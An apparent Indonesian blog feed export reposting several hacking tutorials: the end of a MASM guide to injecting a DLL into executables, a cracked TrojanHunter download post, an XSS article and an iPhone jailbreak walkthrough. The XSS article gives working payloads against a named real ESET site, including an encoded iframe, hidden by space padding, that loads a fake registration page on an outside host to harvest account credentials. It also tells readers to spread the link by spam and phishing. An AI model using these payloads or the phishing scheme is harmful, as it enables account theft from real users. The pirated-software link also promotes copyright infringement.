<span style="color: #888888;"> Invoke SelectObject, Eax, PenangananBitmap</span><br />
<span style="color: #888888;"> Mov hOldBmp, Eax</span><br />
<span style="color: #888888;"> Invoke GetObject, PenangananBitmap, SizeOf BITMAP, Addr bitmap</span><br />
<span style="color: #888888;"> Invoke StretchBlt, hdc, 0, 0, 257, 309,\</span><br />
<span style="color: #888888;"> hMemoryDC, 0, 0, bitmap.bmWidth, bitmap.bmHeight, SRCCOPY</span><br />
<span style="color: #888888;"> Invoke SelectObject, hMemoryDC, hOldBmp</span><br />
<span style="color: #888888;"> Invoke DeleteDC, hMemoryDC</span><br />
<span style="color: #888888;"> Invoke EndPaint, hWnd, Addr ps</span><br />
<span style="color: #888888;"> .ElseIf uMsg==WM_LBUTTONDOWN</span><br />
<span style="color: #888888;"> Invoke DestroyWindow, hWnd</span><br />
<span style="color: #888888;"> .Else</span><br />
<span style="color: #888888;"> Invoke DefWindowProc, hWnd, uMsg, wParam, lParam</span><br />
<span style="color: #888888;"> Ret</span><br />
<span style="color: #888888;"> .EndIf</span><br />
<span style="color: #888888;"> Xor Eax, Eax</span><br />
<span style="color: #888888;"> Ret</span><br />
<span style="color: #888888;"> WndProc EndP</span><br />
<strong>d) The Export</strong><br />
Agar file DLL bisa berjalan normal, Anda harus membuat file *.DEF, misal : Splash.Def. Agar fungsi export<br />
bisa berada dalam export tabel DLL. Kode “Splash.asm” sebenarnya tidak secara spesifik menggunakan<br />
export seperti program “DLL NORMAL” pada umumnya, jadi sebagai contoh Saya sengaja memasukkan<br />
2 buah proses yang ada. Bagi Saya yang penting program bisa berjalan sesuai harapan, untuk hal lain<br />
seperti teori silahkan mempelajarinya di bangku kuliah, karena Saya tidak menyukai kuliah bidang<br />
komputer! Biayanya terlalu mahal.. <img alt=":(" class="wp-smiley" src="http://www.binushacker.net/wp-includes/images/smilies/icon_sad.gif" /> <br />
<span style="color: #888888;">LIBRARY SPLASH.DLL</span><br />
<span style="color: #888888;"> EXPORTS ShowBitMap</span><br />
<span style="color: #888888;"> EXPORTS WndProc</span><br />
<strong>CATATAN : </strong>Jangan menyalin kode pada halaman ini untuk menghindari kesalahan coding. Silahkan<br />
pergunakan kode yang telah disertakan. Saya sarankan Anda membaca terlebih dahulu penjelasan yang<br />
terdapat dalam Source Code.<br />
<br />
<strong>Step 2 : CRACKadabra®.. Jadilah program ajaib!</strong><br />
Untuk melakukan proses compile, silahkan Anda klik ganda file dengan nama “Compile.bat”.<br />
Jangan lupa sebelum melakukan proses compile, sesuaikan terlebih dahulu konfigurasi compiler MASM<br />
yang terdapat pada komputer Anda.<br />
<span style="color: #888888;">Contoh :</span><br />
<span style="color: #888888;"> set letak=C:\masm32\bin</span><br />
<span style="color: #888888;"> set include=C:\masm32\include</span><br />
<span style="color: #888888;"> set lib=C:\masm32\lib</span><br />
<img alt="" class="alignnone" height="253" src="http://farm6.static.flickr.com/5022/5621498763_08244c2e6f_d.jpg" width="500" /><br />
<strong> Screenshot Compile.bat</strong><br />
<br />
<strong>Step 3 : Proses injeksi file executable.</strong><br />
<img alt="" class="alignnone" height="254" src="http://farm6.static.flickr.com/5308/5621498947_e2a9d08cdd_d.jpg" width="400" /><br />
<strong> Screenshot Target.exe</strong><br />
<ul><li>Jalankan tool “IID King” load file “Target.exe”.. Jangan lupa berilah tanda cek pada menu Backup agar jika terjadi kesalahan pada saat injeksi, Anda bisa mengembalikan semua lagi.</li>
<li>Pada kolom “Dll’s Name” masukkan nama file DLL yang akan Anda pergunakan, misal “Splash.dll”</li>
<li>Pada kolom “Function’s Name (case sensitive)” Masukkan salah satu fungsi export yang diperlukan, Anda bisa mendapatkan fungsi export ini pada file “Splash.def”. Misal masukkan fungsi export “ShowBitmap” (tanpa tanda kutip). Untuk menambahkan fungsi export cukup klik tombol “+”, untuk menghapus fungsi export yang tidak Anda inginkan cukup klik tombol “-“.</li>
<li>Setelah itu klik tombol “Add them!!” untuk melakukan injeksi pada target executable. Jika semua berjalan lancar, maka file target yang telah Anda injeksi akan menampilkan Splash Screen setiap kali executable dijalankan.</li>
</ul><img alt="" class="alignnone" height="433" src="http://farm6.static.flickr.com/5190/5621498853_559bd76369_d.jpg" width="500" /><br />
<strong> Screenshot IID King</strong><br />
<br />
<strong>Final notes :</strong><br />
File “Target.exe” yang dijalankan, secara otomatis akan me-load semua link statis DLL pada Import<br />
Table, misal “Splash.dll” dan kemudian mengirim DLL_PROCESS_ATTACH kepada program target.<br />
Perhatikan section baru dengan nama “.IIDKing” setelah terjadi proses injeksi. Dari sini bisa diketahui<br />
tentang cara kerja file DLL tersebut beserta injeksinya. Mudah bukan? Saya harap Anda tidak menemui<br />
kesulitan dalam mempelajari injeksi executable dari artikel <strong>“Tutorial Injeksi Executable – </strong><br />
<strong> MessageBox”</strong> sampai dengan artikel <strong>“Tutorial Injeksi Executable – Splash Screen”</strong>. Bagi Anda<br />
yang tidak sempat membaca artikel ini atau mungkin bosan membaca artikel ini, dan ingin<br />
menggunakan cara instant langsung jadi seperti memasak mie instant, Anda bisa menggunakan software<br />
<strong>MRHPx Splash Add</strong>..<br />
<img alt="" class="alignnone" height="271" src="http://farm6.static.flickr.com/5303/5621498915_a0ce4e551f_d.jpg" width="500" /><br />
<strong> Screenshot MRHPx Splash Add</strong><br />
Teknik ini juga bisa dipergunakan untuk melakukan injeksi yang lain, tidak hanya Splash Screen.<br />
Bayangkan saja jika ada orang yang melakukan injeksi program worm, exploit dan malware lainnya yang<br />
merugikan ke dalam executable? Bukan MessageBox ataupun Splash Screen? Tentunya hal tersebut<br />
akan sangat merugikan. Solusi dari Saya adalah lakukan <em>“Section Dump”</em> atau <em>“Extract Overlay”</em><br />
kemudian lakukan analisa Reverse Engineering (Bukan begitu saudara Apakekdah? ). Hal tersebut<br />
setidaknya akan membantu Anda memperoleh informasi yang cukup tentang malware yang disisipkan di<br />
dalam executable. Sebagai catatan, Antivirus tidak selalu bisa diandalkan untuk hal seperti ini. Semoga<br />
artikel ini bisa memberi manfaat bagi Anda dan membantu Anda menjaga diri Anda dari kejahatan<br />
cyber. Terima kasih.<br />
<a href="http://mrhpx.byethost10.com/reverse-engineering/executable-injection-tutorial-part-2-splash-screen/" title="Download GRATISSSSS!!!!"><strong></strong></a><a href="http://adf.ly/313683/http://www.mrhpx.astalavista.ms/kode733t3by/dlmrhpxdl/download.php?file=www.mrhpx.co.nr-executable-injection-tutorial-part2-splashscreen.part1.rar" target="_blank" title="Download Executable Injection Tutorial - Part 2 : Splash Screen Part 1">Download Executable Injection Tutorial – Part 2 : Splash Screen Part 1</a><br />
<ins><ins id="aswift_3_anchor"></ins></ins><br />
<a href="http://adf.ly/313683/http://www.mrhpx.astalavista.ms/kode733t3by/dlmrhpxdl/download.php?file=www.mrhpx.co.nr-executable-injection-tutorial-part2-splashscreen.part2.rar" target="_blank" title="Download Executable Injection Tutorial - Part 2 : Splash Screen Part 2">Download Executable Injection Tutorial – Part 2 : Splash Screen Part 2</a><br />
<strong>MRHPx regards and messages :</strong><br />
<ul><li>My family for love, peace and emphaty.. Allah SWT and Muhammad SAW for life, light and everything..</li>
</ul><ul><li> Reverse Code Engineering scene, Astalavista.MS, Blackhat Community, 0day,Indonesia veteran hAxx0r (You know who you are.. <img alt=":)" class="wp-smiley" src="http://www.binushacker.net/wp-includes/images/smilies/icon_smile.gif" /> )</li>
</ul><ul><li> Source code semua program atau hack tool (EXCEPT PRIVATE-SECRET TOOLS!) dari seluruh artikel dan rilis NeMeSiS_ByTe dan MRHPx bisa diperoleh dengan cara kontak melalui email baru Saya di atas.. Ehm, sori ganti Nickname sejak 2008 tidak lagi sebagai NeMeSiS_ByTe <img alt=":)" class="wp-smiley" src="http://www.binushacker.net/wp-includes/images/smilies/icon_smile.gif" /> Juga ganti email, ganti website, ganti peruntungan! <img alt=":)" class="wp-smiley" src="http://www.binushacker.net/wp-includes/images/smilies/icon_smile.gif" /> Long live reverser..!</li>
</ul><strong>PENTING :</strong><br />
<ul><li> Jika Anda request software atau tool yang tidak terdapat di website Saya atau sulit didapatkan (baik software gratis atau berbayar), harap mengganti biaya bandwith internet (Download Broadband) dan biaya pengiriman (CD Distribusi Pos). Harap maklum, Saya bukan milyuner yang mempunyai banyak uang, Saya tidak mungkin membiayai setiap request software dan tool yang Anda butuhkan.</li>
</ul><ul><li> Untuk keperluan apapun harap menghubungi Saya melalui email Yahoo atau Facebook, karena nomer telpon Saya hanya untuk keperluan bisnis dan pekerjaan. Bukan dipergunakan untuk CHAT dan tanya jawab.</li>
</ul><strong>Oleh : MRHPx aka NeMeSiS_ByTe aka RiZaL</strong><br />
<strong> (Pasuruan-Malang, Pebruari 2011)</strong><br />
<strong>Email :</strong> <a href="mailto:mrhpx@binushacker.org" title="mrhpx@binushacker.org">mrhpx@binushacker.org</a><br />
<strong>Facebook : </strong><a href="http://www.facebook.com/MRHPx" title="www.facebook.com/MRHPx">www.facebook.com/MRHPx</a> (Menghindari scam, kirim pesan dulu, baru di add)<br />
<strong>Informasi Tutorial Bila Ada Update: <a href="http://mrhpx.byethost10.com/reverse-engineering/executable-injection-tutorial-part-2-splash-screen/">Disini</a></strong><br />
<strong>Mirror: </strong><a href="http://www.mrhpx.co.nr/" title="www.mrhpx.co.nr">www.mrhpx.co.nr</a></div>ichankalberthttp://www.blogger.com/profile/10799786532003158075noreply@blogger.com0tag:blogger.com,1999:blog-1756550600588610983.post-15953541917549099432011-05-23T03:21:00.000+07:002011-05-23T03:21:11.906+07:00Free Download Trojan Hunter<div dir="ltr" style="text-align: left;" trbidi="on"><a href="http://indonesia-blogger.com/"><img border="0" src="http://www.indonesia-blogger.com/img/indonesiablogger.jpg" /></a><br />
<h1>TrojanHunter<sup><small>®</small></sup></h1>TrojanHunter searches for and removes trojans from your system. With an easy-to-use Scanner and a Guard that scans in the background TrojanHunter is a must-have complement to your virus scanner. If you are downloading files from the Internet, you need TrojanHunter!<br />
<br />
<div> <a href="http://www.misec.net/images/th_standard_fullsize.png"><img alt="" border="0" src="http://www.misec.net/images/th_standard_small.png" /></a><br />
<div><a href="http://www.misec.net/products/TrojanHunterSetup.exe"><br />
</a></div></div>Features:<br />
<ul><li> <strong>High-speed file scan engine</strong> capable of detecting modified trojans</li>
<li> <strong>Memory scanning</strong> for detecting <em>any</em> modified variant of a particular build of a trojan</li>
<li> <strong>Registry scanning</strong> for detecting traces of trojans in the registry</li>
<li> <strong>Inifile scanning</strong> for detecting traces of trojans in configuration files</li>
<li> <strong>Port scanning</strong> for detecting open trojan ports</li>
<li> The <strong>Advanced Trojan Analyzer</strong>, an exclusive feature of TrojanHunter, is able to find whole classes of trojans using advanced scanning techniques</li>
<li> <strong>TrojanHunter Guard</strong> for resident memory scanning – detect any trojans if they manage to start up</li>
<li> <strong>LiveUpdate</strong> utility for effortless ruleset updating via the Internet</li>
<li> Process list giving details about every running process on the system, including the path to the actual executable file</li>
<li> Accurate removal of all detected trojans – <strong>even if they are running or if the trojan has injected itself into another process</strong></li>
<li> Built-in netstat viewer</li>
<li> Extensive help files</li>
<li> Free technical support via e-mail</li>
</ul>The current version is <strong>5.3</strong> (Build 994)<br />
TrojanHunter runs on Windows 2000, XP, Vista and Windows 7 (32-bit and 64-bit)<br />
<a href="http://adf.ly/313683/http://letitbit.net/download/3313.38c8b6be9595ebfc8da8370368/TrojanHunter_v5.3_Build_994_Final.rar.html" target="_blank"><img alt="LettBit" src="http://www.binushacker.net/wp-content/uploads/download.gif" /></a> atau <a href="http://adf.ly/313683/http://rapidshare.com/files/363761529/TrojanHunter_v5.3_Build_994_Final.rar" target="_blank"><img alt="Rapidshare" src="http://www.binushacker.net/wp-content/uploads/downloads.gif" /></a><br />
Selamat Menikmati 100% Full Version Trojan Hunter!</div>ichankalberthttp://www.blogger.com/profile/10799786532003158075noreply@blogger.com0tag:blogger.com,1999:blog-1756550600588610983.post-5132417812015372492011-05-23T03:19:00.000+07:002011-05-23T03:19:52.437+07:00XSS: Internet Explorer & Mozilla Firefox<div dir="ltr" style="text-align: left;" trbidi="on"><a href="http://indonesia-blogger.com/"><img border="0" src="http://www.indonesia-blogger.com/img/indonesiablogger.jpg" /></a><br />
Salam hangat untuk sahabat semuanya,<br />
Kali ini saya ingin berbagi pengalaman, bagaimana melakukan XSS di <strong>Internet Explorer 9 & Mozilla Firefox 4.01</strong><br />
<img alt="Internet Explorer 9" height="289" src="http://farm6.static.flickr.com/5104/5744169330_ca336e7ea5.jpg" width="275" /> <img alt="Mozilla Firefox 4.0.1" height="288" src="http://farm4.static.flickr.com/3337/5743620231_d722dbbfaa.jpg" width="275" /><br />
<span style="color: blue;"><strong>Apa sih perbedaanya antara keduanya:</strong></span><br />
<ul><li> Internet Explorer 9 memiliki anti-xss library yang akan memberikan pop-up peringatan untuk melindungi dari aktifitas XSS. <span style="color: red;"><strong>Informasi disini:</strong></span> <a href="http://adf.ly/313683/http://msdn.microsoft.com/en-us/security/aa973814.aspx" target="_blank">http://msdn.microsoft.com/en-us/security/aa973814.aspx</a><br />
<span style="color: red;"><strong>Videonya bisa dilihat disini:</strong></span> <a href="http://adf.ly/313683/http://ecn.channel9.msdn.com/o9/ch9/6/9/6/3/9/4/antiXSS31_2MB_ch9.wmv" target="_blank">http://ecn.channel9.msdn.com/o9/ch9/6/9/6/3/9/4/antiXSS31_2MB_ch9.wmv</a></li>
<li>Mozilla tidak memiliki anti-xss library.</li>
</ul><span style="color: blue;"><strong>Oke yuk mari kita analisa bagaimana XSS ini dapat dilakukan,</strong></span><br />
<span style="color: blue;"><strong>Pertama</strong>:</span> Internet Explorer 9<br />
<ol><li>Secara default, internet explorer 9 akan melakukan proteksi terhadap segala sesuatu yang berbau script, biasanya dalam code “<strong><script></script></strong>“</li>
<img alt="IE Memproteksi XSS" src="http://farm6.static.flickr.com/5065/5743627025_b9659b2b62.jpg" />
<img alt="Default setting XSS Filter" src="http://farm4.static.flickr.com/3356/5744170952_855dca5d70.jpg" />
<li>Agar supaya kita dapat melakukan XSS, maka kita harus menon-aktifkan Anti-XSS Library, dengan melakukan “<strong>Disable</strong>” XSS Filter</li>
<img alt="Disable XSS Filter" src="http://farm3.static.flickr.com/2759/5744171126_a0468c8240.jpg" />
<li>Setelah di “<strong>Disable</strong>“, maka XSS Attack bisa dilakukan di Internet Explorer.</li>
<img alt="XSS Bisa dilakukan di IE9" src="http://farm6.static.flickr.com/5148/5743622475_46cb82c02b.jpg" /></ol><span style="color: blue;"><strong>Kedua:</strong></span> Mozilla Firefox 4.0.1<br />
<ol><li>Mozilla Firefox tidak memiliki Anti-XSS Library, sehingga secara Default kita bisa langsung melakukan XSS.</li>
<img alt="XSS on Mozilla" src="http://farm3.static.flickr.com/2453/5743622879_2fe270d9e0.jpg" />
<li>Namun disediakan XSS Filter dari beberapa plug-in (Silakan dicari sendiri)</li>
</ol><span style="color: blue;"><strong>Oke, yuk mari kita coba seberapa powerfullnya XSS: Cross Site Scripting</strong></span><br />
Saya mau make <strong>Mozilla Firefox 4.0.1 </strong>aja deh.<br />
<span style="color: blue;"><strong>Banyak yang bertanya, apa hebat & bahayanya sih XSS?</strong></span><br />
Yang tidak mengetahui & belum ber-eksperimen pasti bilang:<br />
<ul><li> Apa hebatnya sih, cuman nulis di URL doank</li>
<li>Begituan mah gak ada gunanya</li>
<li>XSS mah gak bisa dideface halamannya</li>
<li>Itu kan cuman perubahan address doank</li>
</ul>Saya hanya tersenyum ketika mendengar diskusi mengenai hal ini <img alt=":)" class="wp-smiley" src="http://www.binushacker.net/wp-includes/images/smilies/icon_smile.gif" /> <br />
Nah, dari sekian banyak bahayanya XSS, mari kita ambil salah satunya “<span style="color: red;"><strong>STEALING ACCOUNT IN VULNERABLE WEBSITE</strong></span>“. (<span style="color: blue;">Harap Dijadikan Bahan Pembelajaran & Proteksi Diri Saja Ya, Artikel Ini Hanya Untuk Menambah Wawasan</span>)<br />
Dalam hal ini saya memanfaatkan <span style="color: red;"><strong>XSS dikombinasikan dengan Human Vulnerability</strong></span>, karena semua pasti sudah mengetahui, bahwa <span style="color: blue;"><strong>Manusia Adalah Unpatched Vulnerability </strong></span> <img alt=":)" class="wp-smiley" src="http://www.binushacker.net/wp-includes/images/smilies/icon_smile.gif" /> <br />
<span style="color: blue;"><strong>Skenarionya adalah:</strong></span><br />
<ol><li>Kita mendapatkan vulnerable website yang bisa dilakukan XSS</li>
<li>Kita membuat sebuah script yang bisa digunakan untuk register / login & membuat sebuah file script (php) yang bisa digunakan untuk mengambil informasi account & menyimpannya di logs.</li>
<li>Kita sebarkan linknya ke beberapa email / messenger / chatbox / irc, dsb.</li>
<li>Tunggu & kita mendapatkannya deh <img alt=":D" class="wp-smiley" src="http://www.binushacker.net/wp-includes/images/smilies/icon_biggrin.gif" /> </li>
</ol>Langkah-langkahnya adalah:<br />
<span style="color: blue;"><strong>Pertama</strong></span><br />
<ul><li> Saya menggunakan vulnerable XSS dari website <strong>www.eset.com.mx, ESET</strong> merupakan salah satu perusahaan AntiVirus yang juga sangat terkenal di Dunia, namun memiliki kelemahan juga di websitenya.<strong><br />
</strong></li>
<li>Test XSS apakah bisa berjalan di website, berikut contohnya: <span style="color: red;"><code>http://www.eset.com.mx/xtrasappz/evalform/index.php?t=emav&promocode=%22%3E%3Ccenter%3E%3Cfont%20size=%22300%22%3EBinus%20Hacker%20Ada%20Disini%3Cbr%3Ehttp://www.binushacker.net%3C/font%3E%3C/center%3E%3C/</code></span></li>
<img alt="Test XSS For Binus Hacker" src="http://farm6.static.flickr.com/5264/5744173926_1c5e84ecf1.jpg" />
<li>Test cookies (ternyata ada), berhubung artikelnya bukan stealing cookies, kita lewatin aja <img alt=":)" class="wp-smiley" src="http://www.binushacker.net/wp-includes/images/smilies/icon_smile.gif" /> </li>
<li>Oke, sudah ketahuan websitenya vulnerable</li>
</ul><span style="color: blue;"><strong>Kedua</strong></span><br />
<ul><li> Dalam benak, banyak ide, antara login & register pages.</li>
<li>Akhirnya kembali coding, membuat page halaman register di ESET</li>
<img alt="Fake Register Pages - Binus Hacker" src="http://farm3.static.flickr.com/2706/5743623359_91f8864db4.jpg" />
<li>Kemudian membuat php untuk menerima hasil & menyimpannya di log, berikut:</li>
<img alt="Script Log Untuk Menyimpan Hasil XSS" src="http://farm6.static.flickr.com/5225/5743623961_38dcd6149c.jpg" />
<li>Fake register tadi yang saya buat saya simpan di: <span style="color: red;"><strong><a href="http://adf.ly/313683/http://restinpeace.biz/eset/" target="_blank">http://restinpeace.biz/eset/</a></strong></span>, permission filenya sudah disetting supaya tidak bisa dibaca filenya, hanya bisa melihat directorynya. Hhehe.. <img alt=":D" class="wp-smiley" src="http://www.binushacker.net/wp-includes/images/smilies/icon_biggrin.gif" /> </li>
</ul><span style="color: blue;"><strong>Ketiga</strong></span><br />
<ul><li>Disini kita akan menggunakan html code <strong><iframe></strong></li>
<li>Sebelum kita melakukan aksi, maka code XSS: “<span style="color: red;"><code><iframe src=http://restinpeace.biz/eset/register.php width=1500></code></span>” di encode dulu menjadi: <span style="color: red;"><code>%3Ciframe%20src%3Dhttp%3A%2F%2Frestinpeace.biz%2Feset%2Fregister.php%20width%3D1500%3E</code></span></li>
<li>Copy code tersebut ke URL sehingga menjadi: <span style="color: red;"><code>http://www.eset.com.mx/xtrasappz/evalform/index.php?t=emav&promocode=%22%3E%3Ciframe%20src%3Dhttp%3A%2F%2Frestinpeace.biz%2Feset%2Fregister.php%20width%3D1500%3E</code></span></li>
<img alt="Eset Node Iframe" src="http://farm4.static.flickr.com/3558/5743624347_ee6c2cd204.jpg" />
<li>Karena masih kelihatan di URL, maka kita tambahin menggunakan spasi (” “), sehingga URL iframe tidak tampak di address karena kepanjangan: <span style="color: red;"><code>http://www.eset.com.mx/xtrasappz/evalform/index.php?t=emav&promocode=%22%3E%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%3Ciframe%20src%3Dhttp%3A%2F%2Frestinpeace.biz%2Feset%2Fregister.php%20width%3D1500%3E</code></span>, sekarang tidak adak kelihatan lagi di URL Address script XSSnya.</li>
<img alt="Menghide URL Address" src="http://farm3.static.flickr.com/2187/5744173634_69e9facd0c.jpg" />
<li>Sudah selesai page untuk fake register, lanjut ke step selanjutnya</li>
</ul><span style="color: blue;"><strong>Keempat</strong></span><br />
<ul><li> Sebarkan melalui email, chat, messenger dan sebagainya, silakan gunakan cara masing-masing. Anda disini belajar menjadi spammer & phiser (<strong>Ingat</strong>! <span style="color: red;">Artikel ini hanya untuk pembelajaran</span>, <span style="color: blue;">kita tidak akan lebih baik jika melakukan kejahatan, namun akan lebih berguna jika kita memiliki ilmu agar tidak terjebak & tertipu oleh penjahat!</span>)</li>
</ul><span style="color: blue;"><strong>Kelima</strong></span><br />
<ul><li> Kita tunggu hasilnya & kita cek log yang masuk</li>
<li>Taaaadddddaaaaaa, ada beberapa yang masuk <img alt=":D" class="wp-smiley" src="http://www.binushacker.net/wp-includes/images/smilies/icon_biggrin.gif" /> </li>
<img alt="Hasilnya & Jangan Lupa Follow Twitter" src="http://farm6.static.flickr.com/5267/5743694845_2e2f2aca1a.jpg" /></ul><span style="color: magenta;"><strong>Download Source Code:</strong></span><br />
<a href="http://adf.ly/313683/http://www.ziddu.com/download/15073955/XSS-Article-BinusHacker.zip.html" target="_blank"><img alt="Download Source Code Xss Article BinusHacker" src="http://www.binushacker.net/wp-content/uploads/downloads.gif" /></a><br />
<strong><span style="color: blue;">Kita tidak akan menjadi hebat dengan melakukan kejahatan, namun kita akan jauh lebih baik jika mengetahui ilmu pengetahuan, membagi dengan yang lain, memproteksi diri sendiri</span>. <span style="color: red;">Tuhan Akan Melihat Apa Yang Ada Pada Niat Yang Kita Lakukan Bukan Dari Pendapat Orang.</span></strong><br />
Jadi untuk semua selamat belajar & semoga bermanfaat.<br />
<h1><strong><span style="color: red;">Silakan </span><span style="color: blue;">Follow</span> <span style="color: #08d5f6;">Twitter</span> <span style="color: green;">Saya <span style="color: magenta;">Untuk</span> <span style="color: #993366;">Bertegur</span> <span style="color: #333399;">Sapa</span></span>: </strong><br />
<a href="https://twitter.com/utuhwibowo" target="_blank"><img alt="Follow Utuh Wibowo Twiiter" src="http://www.utuhwibowo.com/wp-content/uploads/2011/03/followmytwitter.jpg" /></a></h1>Thanks.. Enjoy & Eat It! <img alt=":)" class="wp-smiley" src="http://www.binushacker.net/wp-includes/images/smilies/icon_smile.gif" /> </div>ichankalberthttp://www.blogger.com/profile/10799786532003158075noreply@blogger.com0tag:blogger.com,1999:blog-1756550600588610983.post-48910594957534401282011-05-23T03:15:00.000+07:002011-05-23T03:15:09.878+07:00Tutorial JailBreak iPhone<div dir="ltr" style="text-align: left;" trbidi="on"><a href="http://indonesia-blogger.com/"><img border="0" src="http://www.indonesia-blogger.com/img/indonesiablogger.jpg" /></a><br />
Berikut ini adalah cara jailbreak iphone disertai dengan tutorial jailbreak iphone.<br />
The iPhone <span style="color: #0054a6;">Dev</span> team released an update for redsn0w. You can now jailbreak iOS 4.3.3 for most iOS devices including iPhone, iPad and iPod touch. Most importantly, it supports untethered jailbreak.<br />
As usual, we’ll walk you through the whole <span style="color: #0054a6;">jailbreak process</span> with this tutorial post. But before we begin, let us highlight several points:<br />
<ul><li>This guide is intended to <span style="color: #0054a6;">jailbreaking iPhone</span> 4 and 3GS running <span style="color: #0054a6;">iOS 4</span>.3.3. But it should also work for iPad (1st generation) and iPod touch (3G/4G). Just make sure you download the correct firmware.</li>
<li>If you depend on ultrasn0w unlocking, please stay away from jailbreaking with redsn0w. You should use PwnageTool instead that lets you create a custom IPSW while preserving the baseband version. If you don’t know what we’re talking about, just stay with your current iOS version. Don’t upgrade to 4.3.3, otherwise, you’ll lose the unlock.</li>
<li>Make sure you use iTunes 10.2 or up for the jailbreak. As usual, backup all your contacts, sms, photos, etc via iTunes before jailbreaking.</li>
<li>Disclaimer: Jailbreaking may void your warranty of iPhone. Again, jailbreak it at your own risk. There is no guarantee that this guide works on all iPhone devices.</li>
</ul>Okay, let’s get started.<br />
<img alt="" class="alignnone" height="153" src="http://www.binushacker.net/wp-content/uploads/iOS_4.3.3.jpg" title="IOS 4.3.3" width="221" /><br />
<h3>Upgrade Your iPhone to 4.3.3</h3>To jailbreak iOS 4.3.3 with redsn0w, your iPhone should be upgraded to 4.3.3 via iTunes. Connect your iPhone to computer and upgrade it to the latest version of iOS. Or you can follow these instructions to upgrade it.<br />
<strong>Note:</strong> If your iPhone is already using iOS 4.3.3, just download the firmware file (i.e. step 1) and skip the rest of the section.<br />
1. Download <span style="color: #0054a6;">iPhone OS 4</span>.3.3 firmware (iPhone 4 [GSM] / 3GS) and save it into a folder.<br />
2. Connect your iPhone via USB and launch iTunes.<br />
3. Restore your iPhone with <span style="color: #0054a6;">iPhone OS</span> 4.3.3. For Windows, hold SHIFT key and click on the “Restore” button and select the firmware file (i.e. For 3GS, please select iPhone2,1_4.3.3_8J2_Restore.ipsw. For iPhone 4, please select iPhone3,1_4.3.3_8J2_Restore.ipsw) you have just downloaded. For Mac, hold option key and click on the “Restore” button and select the firmware file to restore.<br />
4. iTunes will then upgrade your iPhone to iOS 4.3.3. Just wait until the process completes.<br />
<h3>Jailbreaking iOS 4.3.3 using Redsn0w</h3>5. Next, download redsn0w 0.9.6rc15 from here:<br />
<span style="color: blue;"><strong>Windows:</strong></span> <a href="http://adf.ly/313683/https://sites.google.com/a/iphone-dev.com/files/home/redsn0w_win_0.9.6rc15.zip?attredirects=0&d=1" target="_blank" title="Redsn0w"><img alt="" class="alignnone" height="52" src="http://www.binushacker.net/wp-content/uploads/downloads.gif" title="Windows" width="160" /></a><br />
<span style="color: blue;"><strong>Macintosh:</strong></span> <a href="http://adf.ly/313683/https://sites.google.com/a/iphone-dev.com/files/home/redsn0w_mac_0.9.6rc15.zip?attredirects=0&d=1" target="_blank" title="Redsn0w mac"><img alt="" class="alignnone" height="52" src="http://www.binushacker.net/wp-content/uploads/downloads.gif" title="Mac" width="160" /></a><br />
<br />
Extract the zipped file after download.<br />
6. Launch Redsn0w<br />
7. Click “browse” and select the iPhone 4.3.3 firmware file. For iPhone 4, please select iPhone3,1_4.3.3_8J2_Restore.ipsw. For iPhone 3GS, please select iPhone2,1_4.3.3_8J2_Restore.ipsw. Redsn0w then verifies your firmware file.<br />
<img alt="redsn0w jailbreak 4.3.3 step 1" height="555" src="http://www.simonblog.com/wordpress/wp-content/uploads/2011/05/redsn0w-jailbreak-4.3.3-step-1.jpg" title="redsn0w jailbreak 4.3.3 step 1" width="400" /><br />
8. RedSn0w will now try to identify and process the firmware file. Once the firmware file has been identified click Next to continue.<br />
9. Redsn0w then starts preparing jailbreak data based on the IPSW file. Just wait till you see the below screen. Select “Install Cydia” and click “Next” to proceed.<br />
<img alt="redsn0w jailbreak 4.3.3 step 2" height="553" src="http://www.simonblog.com/wordpress/wp-content/uploads/2011/05/redsn0w-jailbreak-4.3.3-step-2.jpg" title="redsn0w jailbreak 4.3.3 step 2" width="400" /><br />
10. Just follow the on-screen instruction. Make sure your iPhone is turned OFF and connected with your computer via USB cable. If you haven’t done so, simply connect it with USB and then power it off before you click the “Next” button.<br />
<img alt="redsn0w jailbreak 4.3.3 step 3" height="555" src="http://www.simonblog.com/wordpress/wp-content/uploads/2011/05/redsn0w-jailbreak-4.3.3-step-3.jpg" title="redsn0w jailbreak 4.3.3 step 3" width="400" /><br />
11. Once you click “Next”, follow the procedures to put your iPhone into DFU mode. If you fail to do so, don’t worry. It won’t brick your iPhone. Just restart your device and go through the procedures again.<br />
<img alt="" height="555" src="http://www.simonblog.com/wordpress/wp-content/uploads/2011/05/redsn0w-jailbreak-4.3.3-step-4.jpg" title="redsn0w jailbreak 4.3.3 step 4" width="400" /><br />
12. If you have successfully put your iPhone into DFU mode, redsn0w will do the rest. Just sit back and relax.<br />
While jailbreaking, your iPhone will show downloading jailbreak data, etc. Just don’t touch your iPhone and keep waiting. Once completed, redsn0w will let you know the jailbreak process is successful.<br />
After reboot, your iPhone should be jailbroken with cydia installed. Lastly, sync back your backup data with iTunes and restore all your contacts & SMS.<br />
http://www.youtube.com/watch?feature=player_embedded&v=JeQdVkKnWpg<br />
</div>ichankalberthttp://www.blogger.com/profile/10799786532003158075noreply@blogger.com0tag:blogger.com,1999:blog-1756550600588610983.post-38331820494146789202011-05-23T02:58:00.002+07:002011-05-23T02:58:44.245+07:00<div dir="ltr" style="text-align: left;" trbidi="on"><a href="http://indonesia-blogger.com/"><img border="0" src="http://www.indonesia-blogger.com/img/indonesiablogger.jpg" /></a><br />
